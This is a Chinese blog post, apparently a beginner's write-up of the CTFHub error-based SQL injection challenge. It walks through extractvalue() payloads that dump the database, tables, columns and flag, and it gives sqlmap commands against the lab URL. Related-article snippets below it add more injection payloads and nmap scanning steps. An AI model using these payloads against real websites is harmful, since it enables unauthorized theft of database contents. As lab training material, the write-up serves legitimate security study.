CTFHub笔记之技能树-web:报错注入

最新推荐文章于 2024-06-10 08:30:00 发布
最新推荐文章于 2024-06-10 08:30:00 发布
阅读量390 收藏 1
点赞数
分类专栏: CTF SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123598842
版权

小白一个,如有错误请指正!

对这方面不是很熟悉,补了一下知识点:

https://blog.csdn.net/silence1_/article/details/90812612icon-default.png?t=M276https://blog.csdn.net/silence1_/article/details/90812612

解法一:

1.用extractvalue()函数爆数据库

select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select database()))))

2.爆表名

select * from news where id=1 and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

 

 

3.爆flag表字段 

select * from news where id=1 and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag"))))

4.查看字段内容

select * from news where id=1 and(select extractvalue(1,concat(0x7e,(select group_concat(flag) from flag))))

 5.flag太长显示不全 我裂开 再去补充了些知识点

报错注入显示不全问题_矜装寂寥的博客-CSDN博客目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O)介绍在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法实验环境本次实验使用的是github上开源的sqli-labs训练靶场地址:https://github.com/Audi-1/sqli-labs解决https://blog.csdn.net/m0_51183537/article/details/122012622 6.这里我用mid函数

select * from news where id=1 and(select extractvalue(1,concat(0x7e,mid((select group_concat(flag) from flag),1,20))))

select * from news where id=1 and(select extractvalue(1,concat(0x7e,mid((select group_concat(flag) from flag),21))))

 

7.把字符合并就是flag了

ctfhub{c31412455c660d3281bcaec2} 

解法二:  sqlmap

1.

sqlmap -u http://challenge-1d76fb8538f7a5c0.sandbox.ctfhub.com:10800/?id=1 --dbs

2.

sqlmap -u http://challenge-1d76fb8538f7a5c0.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
 

3.

sqlmap -u http://challenge-1d76fb8538f7a5c0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

4.

sqlmap -u http://challenge-1d76fb8538f7a5c0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C --dump
 

 时间不够 重启了环境 flag有些变化

 


 

weixin_48799157
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
报错注入显示不全问题
矜庄寂寥的博客
12-18 3892
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
CTF夺旗赛-GET参数注入
qq_39687353的博客
05-09 1456
个人笔记仅供参考 1.首先确保kali攻击机和靶机在同一个网段,使用ifconfig查看靶机ip 2.使用nmap -sn -PE 192.168.80.1/24命令扫描出同网段靶机ip 3.使用nmap -sV 192.168.80.132 命令扫描靶机开放服务端口 4.由于扫描出来的端口服务并没有大端口开放,因此存在大端口漏洞几率不高,所以我们再探测80端口使用命令dirb http://192.168.80.132:80 发现存在admin/login目录,于是在浏览器打开网
CTFHUB-SQL注入-报错注入
最新发布
weixin_68416970的博客
06-10 413
报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 533
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
报错注入的一些整理 By Assassin
Assassin
01-29 1243
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法SQL注入1、通过floor暴错 /数据库版本/ http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((se
BEAWebLogicWorkshop使用笔记之三--Web应用篇
03-03
什么是PageFlowPageFlow是一个基于Struts1.1的web应用编程模型,替代了早期Portal产品中的webflow,不再属于Portal专有,用以实现web应用中用户界面、业务逻辑、导航控制的分离,并且大大简化了WEB应用的开发过程,...
An-Web:web前端笔记
03-09
【标题】:“An-Web: Web前端笔记” 在“An-Web: web前端笔记”这个主题中,我们主要探讨的是Web前端开发领域的相关知识。Web前端是构建网站和应用程序的重要部分,它涉及到用户与网站交互的界面设计和实现。这份...
go-web:后端开发指南(笔记
04-09
后端开发攻略(笔记) Golang 攻略 反射与类型断言 练习: 实现生产者消费者模型 实现一个线程安全的队列 实现一个无锁队列 实现一个线程池 Go 连接数据库 Go Web 开发 Web 框架 Gin 框架 Beego 框架 Go 可视化库 ...
joplin-web:用于Joplin的Web应用程序伴侣
02-04
**正文** Joplin是一款流行的开源笔记应用,它支持多平台同步,允许用户创建、编辑和组织笔记。...而对于开发者而言,这个项目是一个很好的学习Django和Joplin API的实践案例,可以帮助你提升Web开发和API整合的技能。
报错注入
j7ur8
06-22 1850
长期更新报错注入的知识,把代码审计这本书上的10种报错姿势吃透。这是一个神奇的登陆界面-floor()报错注入这道题目....给了我新的姿势把, 第一次真正研究报错注入。题目测试很容易 输入"会报错然后就是进行报错注入,测试了一番,没有过滤。然后进行floor()的报错注入1. 开始的姿势:1" and (select 1 from (select count(*), concat(floor(r...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1086
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
Oracle注入——报错注入
weixin_46601374的博客
02-28 1409
1、什么是Oracle数据库? Oracle 数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品。Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 2、Oracle 系统表 Oracle中内置了大量的系统表(有点类似MySQL中的information_schema数据库),根据不同的权限可读取不同的系统表。可通过读取这些系统表获取我们想要的数据(用户信息、表、字段、数据库信息等) DBA、ALL、USER、V_$、GV_$、SESS
ctfhub-报错注入
m0_62094846的博客
12-22 439
查找库名 1 and extractvalue(1,concat(0x7e,database(),0x7e)) 查找表名 1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 查找字段 1 and extractvalue(1,concat(0x7e,(select gr..
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 2920
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTFweb学习记录 -- SQL注入进阶
lifanxin的博客
05-19 585
SQL注入进阶概述时间注入攻击堆叠查询注入攻击二次注入攻击宽字节注入攻击cookie注入攻击base64注入攻击XFF注入攻击总结 概述   这一部分的内容是sql注入知识的进阶部分,引入了更多的注入技巧。 时间注入攻击   时间注入攻击的场景同样也是服务器并不返回查询语句的信息,这和boolean注入攻击类似,boolean注入通过true或false来进行数据库信息猜测。时间注入攻击通过利用sleep()或benchmark()等函数让数据库操作时间变长,以此来判断语句是否成功执行。 # 判断数据库名长
CTFweb学习记录 -- SQL注入检测绕过
lifanxin的博客
05-19 956
SQL注入检测绕过概述大小写绕过双写绕过编码绕过内联注释绕过总结 概述   在学习了一些基本的sql注入知识以及注入技巧后,本篇博客将会总结一些常见的sql注入检测绕过方法。 大小写绕过   大小写绕过很好理解,后端程序会过滤掉一些关键词,比如:select/union/and,此时就无法达到注入的效果。想要绕过这种检测,只需要大写某些字母即可,比如:selEct/UniOn/And,之所以可以这样绕过,一是因为后端的检测逻辑不够完善,二是mysql并不区分大小写。 双写绕过   双写绕过在ctf比赛中十分
CTFHub-报错注入
m0_51589948的博客
05-19 190
报错注入 .在输入1后发现没有获取任何有关数据库的信息,暂时判断为报错注入 然后使用updatexml的语法尝试进行报错注入 -1 union select updatexml(1,(0x7e,(select database()),0x7e),1) 得到库名为sqli 得出信息,可判断为报错注入,继续查询表名 -1 union select updatexml(1,concat(07xe,(select(group_concat(table_name))from information_s
CTFhub 报错注入 and 盲注
m0_63253040的博客
04-01 2598
报错注入 Xpath报错: ...省略 要注意这里要用left right 或者用substr或者limit都可以试试 也可以用floor 或者sqlmap去试试都可以 布尔盲注: 输入0返回query_error 输入1返回query_success 数据库名字长度 数据库名: 这题当查询数据库为空的时候也是回显成功 需要用到if(expr1,expr2,expr3)和子查询 子查询格式:select * from users where id=(select .
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
本篇自学笔记详细探讨了SQL注入中的一个重要技术手段——报错注入报错注入利用的是Web应用程序中未关闭或过滤错误处理功能的情况,攻击者通过构造恶意SQL语句,迫使服务器在执行时返回错误信息,从而间接获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值